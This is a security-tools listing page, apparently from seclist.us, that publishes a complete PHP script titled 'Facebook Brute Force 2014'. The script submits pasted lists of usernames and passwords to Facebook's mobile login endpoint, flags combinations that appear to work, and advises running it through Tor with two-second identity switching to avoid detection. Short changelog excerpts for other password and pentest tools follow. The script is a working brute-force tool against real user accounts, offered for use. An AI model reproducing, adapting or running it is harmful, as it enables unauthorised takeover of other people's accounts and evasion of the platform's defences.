![[PHP Script] Facebook Multi-Account Bruteforce Priv8.](http://seclist.us/wp-content/themes/oxygen/images/archive-thumbnail-placeholder.gif)
Facebook Brute Force 2014.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
<?php ob_start(); @set_time_limit(0); ################################################# #---------------------------------------------- # # Facebook Brute Force 2014 # #Coded by : Mauritania Attacker&Noname-Haxor # #Greetz : All AnonGhost Members # #.... http://seclist.us/ # # --------------------------------------------- # ################################################# echo " <head> <link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/> <form method='POST'> <title>Facebook Brute Force 2014</title> </head> <style> textarea { resize:none; color: #1975FF ; border:1px solid #1975FF ; border-left: 4px solid #1975FF ; } input { color: ##33CCFF; border:1px dotted #33CCFF; } </style>"; echo " <body text='#FFFFFF' background='http://i.imgur.com/yMmSxgU.jpg'> <center><img src='http://i.imgur.com/Vl2suSf.gif'></center> <center>Don't use this script without TOR BROWSER + TOR SWITCHER (set up the interval seconds from TOR SWITCHER TO 2 SECONDS)</center> <p dir='ltr' align='center'> <textarea cols='22' class='area' rows='14' name='username'></textarea> <textarea cols='22' class='area' rows='14' name='password'></textarea><br> <br> <input type='submit' name='scan' value='Start BruteForce'><br></p>"; if(isset($_POST['scan'])){ #To Put Proxy SOCKS V5 //curl_setopt($ch, CURLOPT_PROXY, "proxy:port"); //curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5); function brute($user,$pass){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1"); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}"); curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125"); $login = curl_exec($ch); //print_r($login); $check = (eregi('class="s t i u"',$login)) ? true:false; if($check == true){ echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>"; }else{ echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>"; } } $username = explode("\n", $_POST['username']); $password = explode("\n", $_POST['password']); foreach($username as $users) { $users = @trim($users); foreach($password as $pass) { $pass = @trim($pass); echo brute($users,$pass); } } } echo"<br> <br> <br> <br> <center><p><b><font size='2' face='Trebuchet MS' color='#FFFFFF'>Coded by: Mauritania Attacker&Noname-Hax0r</font></b></p></center>"; ?> |

Change log Release 8.1-pre : * Fixed for cisco-enable if an intial Login/Password is used (thanks to joswr1te for reporting) * Added patch by tux-mind…
Change log: v-0.96:Date: 08/10/2013- Fixes: —— – Bug on “–test –threads=X” with any algorithm. – More syntax details of available parameters in “–help” main parameter….
Change log: v0.95: Date: 26/09/2013 Fixes: _ “–test –algorithm=A” working now. _ Changes in Oracle11g.java class, using constants now (syntax issues). _ Performance improved for NTLM…

Change log: ———– v0.94: Date: 19/09/2013 —– Fixes: —— _ Performance improved dramatically (around 900%) for dictionary decryption method (all rules). Now I am using…

changelog v0.93: Date: 11/09/2013 Fixes: —— _ Error in encrypt main parameter with chained case (wrong encryption in chained algorithms with non-default case) _ Default…
Changelog: ———- version 0.92 (beta): First release. JBrute is an open source tool written in Java to audit security and stronghold of stored password for…
channgelog smbexec v1.2.9.1 : ADDED – r3dy (pentestgeek.com) created a custom cachedump.rb that is a standalone tool to extract dcc’s. This tool extracts non-vista and…